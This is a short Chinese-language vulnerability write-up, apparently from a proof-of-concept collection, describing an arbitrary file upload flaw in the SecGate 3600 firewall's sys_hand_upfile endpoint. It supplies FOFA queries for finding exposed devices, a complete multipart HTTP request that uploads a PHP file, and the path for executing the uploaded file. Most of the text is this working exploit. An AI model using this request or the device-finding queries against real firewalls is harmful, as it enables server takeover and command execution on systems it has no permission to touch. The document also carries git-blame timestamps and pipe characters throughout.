2024-01-22 17:20:09 +08:00
|
|
|
## 网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞
|
|
|
|
|
|
|
|
|
|
网神 SecGate 3600 防火墙 sys_hand_upfile 存在任意文件上传漏洞,攻击者可构造特殊 HTTP 请求上传任意文件获取服务器权限,执行恶意命令等。
|
|
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
|
```
|
|
|
|
|
body="./images/lsec/login/loading.gif"
|
2024-01-22 17:24:37 +08:00
|
|
|
title="网神SecGate 3600防火墙"
|
2024-01-22 17:20:09 +08:00
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## poc
|
|
|
|
|
```
|
|
|
|
|
POST /?g=sys_hand_upfile HTTP/1.1
|
|
|
|
|
Host: 127.0.0.1
|
|
|
|
|
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0)
|
|
|
|
|
Content-Length: 244
|
|
|
|
|
Accept: */*
|
|
|
|
|
Accept-Encoding: gzip, deflate, br
|
|
|
|
|
Connection: keep-alive
|
|
|
|
|
Content-Type: multipart/form-data; boundary=gttd4i4aadwh9lmlp1ez
|
|
|
|
|
|
|
|
|
|
--gttd4i4aadwh9lmlp1ez
|
|
|
|
|
Content-Disposition: form-data; name="upfile"; filename="ceshi.php"
|
|
|
|
|
|
|
|
|
|
<?php echo md5('666');unlink(__FILE__);?>
|
|
|
|
|
--gttd4i4aadwh9lmlp1ez
|
|
|
|
|
Content-Disposition: form-data; name="submit_post"
|
|
|
|
|
|
|
|
|
|
sys_hand_upfile
|
|
|
|
|
--gttd4i4aadwh9lmlp1ez--
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
访问文件路径
|
|
|
|
|
http//127.0.0.1/attachements/ceshi.php
|
